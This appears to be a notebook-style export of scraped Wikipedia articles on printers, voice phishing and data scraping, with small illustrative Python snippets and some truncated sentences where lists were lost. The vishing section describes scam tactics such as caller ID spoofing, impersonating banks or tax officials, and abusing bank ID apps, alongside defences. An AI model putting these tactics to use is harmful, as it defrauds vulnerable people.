Personal printers are mainly designed to support individual users, and may be connected to only a single computer. These printers are designed for low-volume, short-turnaround print jobs, requiring minimal setup time to produce a hard copy of a given document. However, they are generally slow devices ranging from 6 to around 25 pages per minute (ppm), and the cost per page is relatively high. However, this is offset by the on-demand convenience. Some printers can print documents stored on memory cards or from digital cameras and scanners. Networked or shared printers are "designed for high-volume, high-speed printing". They are usually shared by many users on a network and can print at speeds of 45 to around 100 ppm. The Xerox 9700 could achieve 120 ppm. An ID Card printer is used for printing plastic ID cards. These can now be customised with important features such as holographic overlays, HoloKotes and watermarks. citation needed This is either a direct to card printer (the more feasible option, or a retransfer printer. citation needed A virtual printer is a piece of computer software whose user interface and API resembles that of a printer driver, but which is not connected with a physical computer printer. A virtual printer can be used to create a file which is an image of the data which would be printed, for archival purposes or as input to another program, for example to create a PDF or to transmit to another system or user. A barcode printer is a computer peripheral for printing barcode labels or tags that can be attached to, or printed directly on, physical objects. Barcode printers are commonly used to label cartons before shipment, or to label retail items with UPCs or EANs. A 3D printer is a device for making a three-dimensional object from a 3D model or other electronic data source through additive processes in which successive layers of material (including plastics, metals, food, cement, wood, and other materials) are laid down under computer control. It is called a printer by analogy with an inkjet printer which produces a two-dimensional document by a similar process of depositing a layer of ink on paper. A card printer is an electronic desktop printer with single card feeders which print and personalize plastic cards. In this respect they differ from, for example, label printers which have a continuous supply feed. Card dimensions are usually 85.60 53.98 mm, standardized under ISO IEC 7810 as ID 1. This format is also used in EC-cards, telephone cards, credit cards, driver's licenses and health insurance cards. This is commonly known as the bank card format. Card printers are controlled by corresponding printer drivers or by means of a specific programming language. Generally card printers are designed with laminating, striping, and punching functions, and use desktop or web-based software. The hardware features of a card printer differentiate a card printer from the more traditional printers, as ID cards are usually made of PVC plastic and require laminating and punching. Different card printers can accept different card thickness and dimensions. The principle is the same for practically all card printers: the plastic card is passed through a thermal print head at the same time as a color ribbon. The color from the ribbon is transferred onto the card through the heat given out from the print head. The standard performance for card printing is 300 dpi (300 dots per inch, equivalent to 11.8 dots per mm). 
There are different printing processes, which vary in their detail: Common printing problems Variations in card printers There are basically two categories of card printer software: desktop-based, and web-based (online). The biggest difference between the two is whether or not a customer has a printer on their network that is capable of printing identification cards. If a business already owns an ID card printer, then a desktop-based badge maker is probably suitable for their needs. Typically, large organizations who have high employee turnover will have their own printer. A desktop-based badge maker is also required if a company needs their IDs make instantly. An example of this is the private construction site that has restricted access. However, if a company does not already have a local (or network) printer that has the features they need, then the web-based option is a perhaps a more affordable solution. The web-based solution is good for small businesses that do not anticipate a lot of rapid growth, or organizations who either can not afford a card printer, or do not have the resources to learn how to set up and use one. Generally speaking, desktop-based solutions involve software, a database (or spreadsheet) and can be installed on a single computer or network. Alongside the basic function of printing cards, card printers can also read and encode magnetic stripes as well as contact and contact free RFID chip cards (smart cards). Thus card printers enable the encoding of plastic cards both visually and logically. Plastic cards can also be laminated after printing. Plastic cards are laminated after printing to achieve a considerable increase in durability and a greater degree of counterfeit prevention. Some card printers come with an option to print both sides at the same time, which cuts down the time taken to print and less margin of error. In such printers one side of id card is printed and then the card is flipped in the flip station and other side is printed. Alongside the traditional uses in time attendance and access control (in particular with photo personalization), countless other applications have been found for plastic cards, e.g. for personalized customer and members' cards, for sports ticketing and in local public transport systems for the production of season tickets, for the production of school and college identity cards as well as for the production of national ID cards. The choice of print technology has a great effect on the cost of the printer and cost of operation, speed, quality and permanence of documents, and noise. Some printer technologies do not work with certain types of physical media, such as carbon paper or transparencies. A second aspect of printer technology that is often forgotten is resistance to alteration: liquid ink, such as from an inkjet head or fabric ribbon, becomes absorbed by the paper fibers, so documents printed with liquid ink are more difficult to alter than documents printed with toner or solid inks, which do not penetrate below the paper surface. Cheques can be printed with liquid ink or on special cheque paper with toner anchorage so that alterations may be detected. 12 The machine-readable lower portion of a cheque must be printed using MICR toner or ink. Banks and other clearing houses employ automation equipment that relies on the magnetic flux from these specially printed characters to function properly. 
The following printing technologies are routinely found in modern printers: A laser printer rapidly produces high quality text and graphics. As with digital photocopiers and multifunction printers (MFPs), laser printers employ a xerographic printing process but differ from analog photocopiers in that the image is produced by the direct scanning of a laser beam across the printer's photoreceptor. Another toner-based printer is the LED printer which uses an array of LEDs instead of a laser to cause toner adhesion to the print drum. Inkjet printers operate by propelling variably sized droplets of liquid ink onto almost any sized page. They are the most common type of computer printer used by consumers. Solid ink printers, also known as phase-change ink or hot-melt ink printers, are a type of thermal transfer printer, graphics sheet printer or 3D printer . They use solid sticks, crayons, pearls or granular ink materials. Common inks are CMYK-colored ink, similar in consistency to candle wax, which are melted and fed into a piezo crystal operated print-head. A Thermal transfer printhead jets the liquid ink on a rotating, oil coated drum. The paper then passes over the print drum, at which time the image is immediately transferred, or transfixed, to the page. Solid ink printers are most commonly used as color office printers and are excellent at printing on transparencies and other non-porous media. Solid ink is also called phase-change or hot-melt ink was first used by Data Products and Howtek, Inc., in 1984. 13 Solid ink printers can produce excellent results with text and images. Some solid ink printers have evolved to print 3D models, for example, Visual Impact Corporation 14 of Windham, NH was started by retired Howtek employee, Richard Helinski whose 3D patents US4721635 and then US5136515 was licensed to Sanders Prototype, Inc., later named Solidscape, Inc. Acquisition and operating costs are similar to laser printers. Drawbacks of the technology include high energy consumption and long warm-up times from a cold state. Also, some users complain that the resulting prints are difficult to write on, as the wax tends to repel inks from pens, and are difficult to feed through automatic document feeders, but these traits have been significantly reduced in later models. This type of thermal transfer printer is only available from one manufacturer, Xerox, manufactured as part of their Xerox Phaser office printer line. Previously, solid ink printers were manufactured by Tektronix, but Tektronix sold the printing business to Xerox in 2001. A dye-sublimation printer (or dye-sub printer) is a printer that employs a printing process that uses heat to transfer dye to a medium such as a plastic card, paper, or canvas. The process is usually to lay one color at a time using a ribbon that has color panels. Dye-sub printers are intended primarily for high-quality color applications, including color photography; and are less well-suited for text. While once the province of high-end print shops, dye-sublimation printers are now increasingly used as dedicated consumer photo printers. Thermal printers work by selectively heating regions of special heat-sensitive paper. Monochrome thermal printers are used in cash registers, ATMs, gasoline dispensers and some older inexpensive fax machines. Colors can be achieved with special papers and different temperatures and heating rates for different colors; these colored sheets are not required in black-and-white output. 
One example is Zink (a portmanteau of "zero ink"). The following technologies are either obsolete, or limited to special applications though most were, at one time, in widespread use. Impact printers rely on a forcible impact to transfer ink to the media. The impact printer uses a print head that either hits the surface of the ink ribbon, pressing the ink ribbon against the paper (similar to the action of a typewriter), or, less commonly, hits the back of the paper, pressing the paper against the ink ribbon (the IBM 1403 for example). All but the dot matrix printer rely on the use of fully formed characters, letterforms that represent each of the characters that the printer was capable of printing. In addition, most of these printers were limited to monochrome, or sometimes two-color, printing in a single typeface at one time, although bolding and underlining of text could be done by "overstriking", that is, printing two or more impressions either in the same character position or slightly offset. Impact printers varieties include typewriter-derived printers, teletypewriter-derived printers, daisywheel printers, dot matrix printers, and line printers. Dot-matrix printers remain in common use 15 in businesses where multi-part forms are printed. An overview of impact printing 16 contains a detailed description of many of the technologies used. Several different computer printers were simply computer-controllable versions of existing electric typewriters. The Friden Flexowriter and IBM Selectric-based printers were the most-common examples. The Flexowriter printed with a conventional typebar mechanism while the Selectric used IBM's well-known "golf ball" printing mechanism. In either case, the letter form then struck a ribbon which was pressed against the paper, printing one character at a time. The maximum speed of the Selectric printer (the faster of the two) was 15.5 characters per second. The common teleprinter could easily be interfaced with the computer and became very popular except for those computers manufactured by IBM. Some models used a "typebox" that was positioned, in the X- and Y-axes, by a mechanism, and the selected letter form was struck by a hammer. Others used a type cylinder in a similar way as the Selectric typewriters used their type ball. In either case, the letter form then struck a ribbon to print the letterform. Most teleprinters operated at ten characters per second although a few achieved 15 CPS. Daisy wheel printers operate in much the same fashion as a typewriter. A hammer strikes a wheel with petals, the "daisy wheel", each petal containing a letter form at its tip. The letter form strikes a ribbon of ink, depositing the ink on the page and thus printing a character. By rotating the daisy wheel, different characters are selected for printing. These printers were also referred to as letter-quality printers because they could produce text which was as clear and crisp as a typewriter. The fastest letter-quality printers printed at 30 characters per second. The term dot matrix printer is used for impact printers that use a matrix of small pins to transfer ink to the page. 17 The advantage of dot matrix over other impact printers is that they can produce graphical images in addition to text; however the text is generally of poorer quality than impact printers that use letterforms (type). 
Dot-matrix printers can be broadly divided into two major classes: Dot matrix printers can either be character-based or line-based (that is, a single horizontal series of pixels across the page), referring to the configuration of the print head. In the 1970s and '80s, dot matrix printers were one of the more common types of printers used for general use, such as for home and small office use. Such printers normally had either 9 or 24 pins on the print head (early 7 pin printers also existed, which did not print descenders). There was a period during the early home computer era when a range of printers were manufactured under many brands such as the Commodore VIC 1525 using the Seikosha Uni-Hammer system. This used a single solenoid with an oblique striker that would be actuated 7 times for each column of 7 vertical pixels while the head was moving at a constant speed. The angle of the striker would align the dots vertically even though the head had moved one dot spacing in the time. The vertical dot position was controlled by a synchronized longitudinally ribbed platen behind the paper that rotated rapidly with a rib moving vertically seven dot spacings in the time it took to print one pixel column. 18 24 pin print heads were able to print at a higher quality and started to offer additional type styles and were marketed as Near Letter Quality by some vendors. Once the price of inkjet printers dropped to the point where they were competitive with dot matrix printers, dot matrix printers began to fall out of favour for general use. Some dot matrix printers, such as the NEC P6300, can be upgraded to print in color. This is achieved through the use of a four-color ribbon mounted on a mechanism (provided in an upgrade kit that replaces the standard black ribbon mechanism after installation) that raises and lowers the ribbons as needed. Color graphics are generally printed in four passes at standard resolution, thus slowing down printing considerably. As a result, color graphics can take up to four times longer to print than standard monochrome graphics, or up to 8 16 times as long at high resolution mode. Dot matrix printers are still commonly used in low-cost, low-quality applications such as cash registers, or in demanding, very high volume applications like invoice printing. Impact printing, unlike laser printing, allows the pressure of the print head to be applied to a stack of two or more forms to print multi-part documents such as sales invoices and credit card receipts using continuous stationery with carbonless copy paper. It also has security advantages as ink impressed into a paper matrix by force is harder to erase invisibly. Dot-matrix printers were being superseded even as receipt printers after the end of the twentieth century. Line printers print an entire line of text at a time. Four principal designs exist. In each case, to print a line, precisely timed hammers strike against the back of the paper at the exact moment that the correct character to be printed is passing in front of the paper. The paper presses forward against a ribbon which then presses against the character form and the impression of the character form is printed onto the paper. Each system could have slight timing issues, which could cause minor misalignment of the resulting printed characters. For drum or typebar printers, this appeared as vertical misalignment, with characters being printed slightly above or below the rest of the line. 
In chain or bar printers, the misalignment was horizontal, with printed characters being crowded closer together or farther apart. This was much less noticeable to human vision than vertical misalignment, where characters seemed to bounce up and down in the line, so they were considered as higher quality print. Line printers are the fastest of all impact printers and are used for bulk printing in large computer centres. A line printer can print at 1100 lines per minute or faster, frequently printing pages more rapidly than many current laser printers. On the other hand, the mechanical components of line printers operate with tight tolerances and require regular preventive maintenance (PM) to produce a top quality print. They are virtually never used with personal computers and have now been replaced by high-speed laser printers. The legacy of line printers lives on in many operating systems, which use the abbreviations "lp", "lpr", or "LPT" to refer to printers. Liquid ink electrostatic printers use a chemical coated paper, which is charged by the print head according to the image of the document. 23 The paper is passed near a pool of liquid ink with the opposite charge. The charged areas of the paper attract the ink and thus form the image. This process was developed from the process of electrostatic copying. 24 Color reproduction is very accurate, and because there is no heating the scale distortion is less than 0.1%. (All laser printers have an accuracy of 1%.) Worldwide, most survey offices used this printer before color inkjet plotters become popular. Liquid ink electrostatic printers were mostly available in 36 to 54 inches (910 to 1,370 mm) width and also 6 color printing. These were also used to print large billboards. It was first introduced by Versatec, which was later bought by Xerox. 3M also used to make these printers. 25 Pen-based plotters were an alternate printing technology once common in engineering and architectural firms. Pen-based plotters rely on contact with the paper (but not impact, per se) and special purpose pens that are mechanically run over the paper to create text and images. Since the pens output continuous lines, they were able to produce technical drawings of higher resolution than was achievable with dot-matrix technology. 26 Some plotters used roll-fed paper, and therefore had a minimal restriction on the size of the output in one dimension. These plotters were capable of producing quite sizable drawings. A number of other sorts of printers are important for historical reasons, or for special purpose uses. Printers can be connected to computers in many ways: directly by a dedicated data cable such as the USB, through a short-range radio like Bluetooth, a local area network using cables (such as the Ethernet) or radio (such as WiFi), or on a standalone basis without a computer, using a memory card or other portable data storage device. Most printers other than line printers accept control characters or unique character sequences to control various printer functions. These may range from shifting from lower to upper case or from black to red ribbon on typewriter printers to switching fonts and changing character sizes and colors on raster printers. Early printer controls were not standardized, with each manufacturer's equipment having its own set. The IBM Personal Printer Data Stream (PPDS) became a commonly used command set for dot-matrix printers. Today, most printers accept one or more page description languages (PDLs). 
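As a small illustration of the in-band control sequences described above, the sketch below assembles a tiny print job using a few widely documented ESC/P codes (ESC @ to initialize, ESC E and ESC F for emphasized text, and a form feed). The exact codes a given printer honours depend on its command set, and writing to a .prn file here merely stands in for sending the bytes to a printer port.

ESC = b"\x1b"

job = b"".join([
    ESC + b"@",            # ESC @ : initialize the printer
    b"Plain text line\r\n",
    ESC + b"E",            # ESC E : select emphasized (bold) printing
    b"Emphasized line\r\n",
    ESC + b"F",            # ESC F : cancel emphasized printing
    b"\x0c",               # form feed : eject the page
])

# Hypothetical usage: write the raw job to a file that could later be copied to a printer port.
with open("sample_job.prn", "wb") as f:
    f.write(job)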
Laser printers with greater processing power frequently offer support for variants of Hewlett-Packard's Printer Command Language (PCL), PostScript or XML Paper Specification. Most inkjet devices support manufacturer proprietary PDLs such as ESC P. The diversity in mobile platforms have led to various standardization efforts around device PDLs such as the Printer Working Group (PWG's) PWG Raster. The speed of early printers was measured in units of characters per minute (cpm) for character printers, or lines per minute (lpm) for line printers. Modern printers are measured in pages per minute (ppm). These measures are used primarily as a marketing tool, and are not as well standardised as toner yields. Usually pages per minute refers to sparse monochrome office documents, rather than dense pictures which usually print much more slowly, especially color images. Speeds in ppm usually apply to A4 paper in most countries in the world, and letter paper size, about 6% shorter, in North America. The data received by a printer may be: Some printers can process all four types of data, others not. Today it is possible to print everything (even plain text) by sending ready bitmapped images to the printer. This allows better control over formatting, especially among machines from different vendors. Many printer drivers do not use the text mode at all, even if the printer is capable of it. 6 A monochrome printer can only produce monochrome images, with only shades of a single color. Most printers can produce only two colors, black (ink) and white (no ink). With half-tonning techniques, however, such a printer can produce acceptable grey-scale images too A color printer can produce images of multiple colors. A photo printer is a color printer that can produce images that mimic the color range (gamut) and resolution of prints made from photographic film. The page yield is the number of pages that can be printed from a toner cartridge or ink cartridge—before the cartridge needs to be refilled or replaced. The actual number of pages yielded by a specific cartridge depends on a number of factors. 27 For a fair comparison, many laser printer manufacturers use the ISO IEC 19752 process to measure the toner cartridge yield. 28 29 In order to fairly compare operating expenses of printers with a relatively small ink cartridge to printers with a larger, more expensive toner cartridge that typically holds more toner and so prints more pages before the cartridge needs to be replaced, many people prefer to estimate operating expenses in terms of cost per page (CPP). 28 Retailers often apply the "razor and blades" model: a company may sell a printer at cost and make profits on the ink cartridge, paper, or some other replacement part. This has caused legal disputes regarding the right of companies other than the printer manufacturer to sell compatible ink cartridges. To protect their business model, several manufacturers invest heavily in developing new cartridge technology and patenting it. Other manufacturers, in reaction to the challenges from using this business model, choose to make more money on printers and less on ink, promoting the latter through their advertising campaigns. Finally, this generates two clearly different proposals: "cheap printer expensive ink" or "expensive printer cheap ink". Ultimately, the consumer decision depends on their reference interest rate or their time preference. From an economics viewpoint, there is a clear trade-off between cost per copy and cost of the printer. 
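As a worked example of the cost-per-page comparison described above, the snippet below simply divides cartridge price by rated page yield. The prices and yields are made-up illustrative figures, not measurements for any real printer; actual ISO/IEC 19752-style yields are published by manufacturers.

def cost_per_page(cartridge_price, rated_page_yield):
    # Cost per page = cartridge price divided by the number of pages it is rated to print.
    return cartridge_price / rated_page_yield

# Hypothetical figures for comparison only:
inkjet_cpp = cost_per_page(cartridge_price=25.00, rated_page_yield=300)    # about 0.083 per page
laser_cpp = cost_per_page(cartridge_price=80.00, rated_page_yield=2600)    # about 0.031 per page

print(f"Inkjet: {inkjet_cpp:.3f} per page")
print(f"Laser:  {laser_cpp:.3f} per page")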
Printer steganography is a type of steganography "hiding data within data" 30 produced by color printers, including Brother, Canon, Dell, Epson, HP, IBM, Konica Minolta, Kyocera, Lanier, Lexmark, Ricoh, Toshiba and Xerox 31 brand color laser printers, where tiny yellow dots are added to each page. The dots are barely visible and contain encoded printer serial numbers, as well as date and time stamps. As of 2020 2021, the largest worldwide vendor of printers is Hewlett-Packard, followed by Canon, Brother, Seiko Epson and Kyocera. 32 Other known vendors include NEC, Ricoh, Xerox, Lexmark, 33 OKI, Sharp, Konica Minolta, Samsung, Kodak, Dell, Toshiba, Star Micronics, Citizen and Panasonic. |
304 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Voice_phishing | Voice phishing, or vishing, 1 is the use of telephony (often Voice over IP telephony) to conduct phishing attacks. Landline telephone services have traditionally been trustworthy; terminated in physical locations known to the telephone company, and associated with a bill-payer. Now however, vishing fraudsters often use modern Voice over IP (VoIP) features such as caller ID spoofing and automated systems (IVR) to impede detection by law enforcement agencies. Voice phishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals. Usually, voice phishing attacks are conducted using automated text-to-speech systems that direct a victim to call a number controlled by the attacker, however some use live callers. 1 Posing as an employee of a legitimate body such as the bank, police, telephone or internet provider, the fraudster attempts to obtain personal details and financial information regarding credit card, bank accounts (e.g. the PIN), as well as personal information of the victim. With the received information, the fraudster might be able to access and empty the account or commit identity fraud. Some fraudsters may also try to persuade the victim to transfer money to another bank account or withdraw cash to be given to them directly. 2 Callers also often pose as law enforcement or as an Internal Revenue Service employee. 3 4 Scammers often target immigrants and the elderly, 5 who are coerced to wire hundreds to thousands of dollars in response to threats of arrest or deportation. 3 Bank account data is not the only sensitive information being targeted. Fraudsters sometimes also try to obtain security credentials from consumers who use Microsoft or Apple products by spoofing the caller ID of Microsoft or Apple Inc. Audio deepfakes have been used to commit fraud, by fooling people into thinking they are receiving instructions from a trusted individual. 6 Common motives include financial reward, anonymity, and fame. 13 Confidential banking information can be utilized to access the victims' assets. Individual credentials can be sold to individuals who would like to hide their identity to conduct certain activities, such as acquiring weapons. 13 This anonymity is perilous and may be difficult to track by law enforcement. Another rationale is that phishers may seek fame among the cyber attack community. 13 Voice phishing comes in various forms. There are various methods and various operation structures for the different types of phishing. Usually, scammers will employ social engineering to convince victims of a role they are playing and to create a sense of urgency to leverage against the victims. Voice phishing has unique attributes that separate the attack method from similar alternatives such as email phishing. With the increased reach of mobile phones, phishing allows for the targeting of individuals without working knowledge of email but who possess a phone, such as the elderly. The historical prevalence of call centers that ask for personal and confidential information additionally allows for easier extraction of sensitive information from victims due to the trust many users have while speaking to someone on the phone. Through voice communication, vishing attacks can be personable and therefore more impactful than similar alternatives such as email. 
The faster response time to an attack attempt due to the increased accessibility to a phone is another unique aspect, in comparison to an email where the victim may take longer time to respond. 14 A phone number is difficult to block and scammers can often simply change phone numbers if a specific number is blocked and often find ways around rules and regulations. Phone companies and governments are constantly seeking new ways to curb false scam calls. 15 A voice phishing attack may be initiated through different delivery mechanisms. 16 A scammer may directly call a victim and pretend to be a trustworthy person by spoofing their caller ID, appearing on the phone as an official or someone nearby. 16 Scammers may also deliver pre-recorded, threatening messages to victims' voicemail inboxes to coerce victims into taking action. 16 Victims may also receive a text message which requests them to call a specified number and be charged for calling the specific number. 16 Additionally, the victim may receive an email impersonating a bank; The victim then may be coerced into providing private information, such as a PIN, account number, or other authentication credentials in the phone call. 16 Voice phishing attackers will often employ social engineering to convince victims to give them money and or access to personal data. 17 Generally, scammers will attempt to create a sense of urgency and or a fear of authority to use as a leverage against the victims. 16 Voice phishing attacks can be difficult for victims to identify because legitimate institutions such as banks sometimes ask for sensitive personal information over the phone. 8 Phishing schemes may employ pre-recorded messages of notable, regional banks to make them indistinguishable from legitimate calls. citation needed Additionally, victims, particularly the elderly, 8 may forget or not know about scammers' ability to modify their caller ID, making them more vulnerable to voice phishing attacks. citation needed The US Federal Trade Commission (FTC) suggests several ways for the average consumer to detect phone scams. 22 The FTC warns against making payments using cash, gift cards, and prepaid cards, and asserts that government agencies do not call citizens to discuss personal information such as Social Security numbers. 22 Additionally, potential victims can pay attention to characteristics of the phone call, such as the tone or accent of the caller 8 28 or the urgency of the phone call 22 to determine whether or not the call is legitimate. The primary strategy recommended by the FTC to avoid falling victim to voice phishing is to not answer calls from unknown numbers. 9 However, when a scammer utilizes VoIP to spoof their caller ID, or in circumstances where victims do answer calls, other strategies include not pressing buttons when prompted, and not answering any questions asked by a suspicious caller. 9 On March 31, 2020, in an effort to reduce vishing attacks that utilize caller ID spoofing, the US Federal Communications Commission adopted a set of mandates known as STIR SHAKEN, a framework intended to be used by phone companies to authenticate caller ID information. 29 All U.S. phone service providers had until June 30, 2021, to comply with the order and integrate STIR SHAKEN into their infrastructure to lessen the impact of caller ID spoofing. 29 In some countries, social media is used to call and communicate with the public. 
On certain social media platforms, government and bank profiles are verified and unverified government and bank profiles would be fake profiles. 30 The most direct and effective mitigation strategy is training the general public to understand common traits of a voice phishing attack to detect phishing messages. 31 A more technical approach would be the use of software detection methods. Generally, such mechanisms are able to differentiate between phishing calls and honest messages and can be more cheaply implemented than public training. 31 A straightforward method of phishing detection is the usage of blacklists. Recent research has attempted to make accurate distinctions between legitimate calls and phishing attacks using artificial intelligence and data analysis. 32 To further advance research in the fake audio field, different augmentations and feature designs have been explored. 33 By analyzing and converting phone calls to texts, artificial intelligence mechanisms such as natural language processing can be used to identify if the phone call is a phishing attack. 32 Specialized systems, such as phone apps, can submit fake data to phishing calls. Additionally, various law enforcement agencies are continually making efforts to discourage scammers from conducting phishing calls by imposing harsher penalties upon attackers. 31 29 Between 2012 and 2016, a voice phishing scam ring posed as Internal Revenue Service and immigration employees to more than 50,000 individuals, stealing hundreds of millions of dollars as well as victims' personal information. 5 Alleged co-conspirators from the United States and India threatened vulnerable respondents with "arrest, imprisonment, fines, or deportation. 5 In 2018, 24 defendants were sentenced, with the longest imprisonment being 20 years. 5 On March 28, 2021, the Federal Communications Commission issued a statement warning Americans of the rising number of phone scams regarding fraudulent COVID 19 products. 34 Voice phishing schemes attempting to sell products which putatively "prevent, treat, mitigate, diagnose or cure" COVID 19 have been monitored by the Food and Drug Administration as well. 35 Beginning in 2015, a phishing scammer impersonated Hollywood make-up artists and powerful female executives to coerce victims to travel to Indonesia and pay sums of money under the premise that they'll be reimbursed. Using social engineering, the scammer researched the lives of their victims extensively to mine details to make the impersonation more believable. The scammer called victims directly, often multiple times a day and for hours at a time to pressure victims. 36 The 2015 cyber attack campaign against the Israeli academic Dr. Thamar Eilam Gindin illustrates the use of a vishing attack as a precursor to escalating future attacks with the new information coerced from a victim. After the Iran-expert academic mentioned connections within Iran on Israeli Army Radio, Thamar received a phone call to request an interview with the professor for the Persian BBC. To view the questions ahead of the proposed interview, Thamar was instructed to access a Google Drive document that requested her password for access. By entering her password to access the malicious document, the attacker can use the credentials for further elevated attacks. 37 In Sweden, Mobile Bank ID is a phone app (launched 2011) that is used to identify a user in internet banking. 
The user logs in to the bank on a computer, the bank activates the phone app, and the user enters a password in the phone to complete the login. In this scam, malicious actors called people claiming to be bank officers, said there was a security problem, and asked the victim to use their Mobile Bank ID app. Fraudsters were then able to log in to the victim's account without the victim providing their password, and to transfer money out of the account. If the victim was a customer of the Swedish bank Nordea, scammers were also able to use the victim's account directly from their phone. In 2018, the app was changed to require users to photograph a QR code on their computer screen. This ensures that the phone and the computer are co-located, which has largely eliminated this type of fraud. |
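The blacklist approach mentioned earlier in this article can be sketched in a few lines: screen an incoming caller ID against a set of previously reported numbers. The numbers below are placeholders, and because caller IDs can be spoofed, a real system would treat a "clean" result as inconclusive rather than safe.

# Hypothetical set of previously reported scam numbers.
REPORTED_NUMBERS = {"+1-555-0100", "+1-555-0101"}

def screen_call(caller_id):
    # Reject known-bad numbers; everything else is merely "not yet reported".
    if caller_id in REPORTED_NUMBERS:
        return "reject: caller ID matches the phishing blacklist"
    return "allow: no blacklist match (the caller ID may still be spoofed)"

print(screen_call("+1-555-0100"))
print(screen_call("+1-555-0199"))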
305 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Report_mining | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
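As a concrete companion to the description above of a web scraper that fetches a page by URL, extracts data, and stores it for later analysis, here is a minimal sketch using the requests, BeautifulSoup, and pandas libraries already loaded earlier in this notebook. The URL and CSS selector are placeholders, not taken from the source text.
import requests
import pandas as pd
from bs4 import BeautifulSoup

def scrape_table_rows(url, selector="table tr"):
    # Fetch the page (what a browser does when a user views it) ...
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # ... then parse it and extract the cells of every matching row.
    soup = BeautifulSoup(response.text, "html.parser")
    rows = []
    for tr in soup.select(selector):
        cells = [cell.get_text(strip=True) for cell in tr.find_all(["td", "th"])]
        if cells:
            rows.append(cells)
    # Store the extracted data for subsequent analysis.
    return pd.DataFrame(rows)

# df = scrape_table_rows("https://example.com/listings")  # placeholder URL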
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
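A hedged sketch of the report-mining idea described above: rather than querying the live source system, parse a static, human-readable report that was spooled to a file. The file name is hypothetical, and pandas.read_html (which uses the html5lib parser installed at the top of this notebook) is just one convenient way to pull tables out of an HTML report.
import pandas as pd

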